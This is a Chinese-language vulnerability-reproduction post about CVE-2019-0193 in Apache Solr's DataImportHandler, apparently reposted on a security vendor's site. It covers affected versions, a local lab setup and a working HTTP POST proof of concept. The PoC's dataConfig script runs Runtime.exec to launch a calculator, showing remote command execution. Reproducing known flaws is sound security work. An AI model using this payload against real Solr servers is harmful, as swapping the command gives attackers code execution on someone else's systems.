长亭百川云 - 文章详情

CVE-2019-0193:Apache Solr 远程命令执行漏洞复现 - PaperPen

博客园 - PaperPen

42

2024-07-19

0x00 漏洞背景

2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重

0x01 影响范围

Apache Solr < 8.2.0

0x02 环境搭建

下载地址https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

在本地解压,进入solr-7.7.2目录,执行命令 bin/solr -e dih (前提:java环境)

然后访问http://localhost:8983/solr即可访问环境

0x03 漏洞利用

首先我们可以通过接口 curl http://127.0.0.1:8983/solr/admin/cores 来获取所有 core 信息,下面我们构造 payload 需要 name 信息

 在Burp中发送以下POC即可执行命令弹出计算器,下面的 <your_core_name> 需要替换为你获取到的 core 的 name(共两处)

POST /solr/<your\_core\_name\>/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose\=false&clean\=false&commit\=true&debug\=true&core\=<your\_core\_name\>&name\=dataimport&dataConfig\=
<dataConfig\>
<dataSource type\="URLDataSource"/>
<script\><!\[CDATA\[
function poc(row){
var process\= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
\]\]\></script\>
<document\>
<entity name\="stackoverflow"
url\="https://stackoverflow.com/feeds/tag/solr"
processor\="XPathEntityProcessor"
forEach\="/feed"
transformer\="script:poc" />
</document\>
</dataConfig\>

执行效果如下:


如果想了解最新漏洞复现过程,欢迎扫码关注 Timeline Sec 公众号!

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2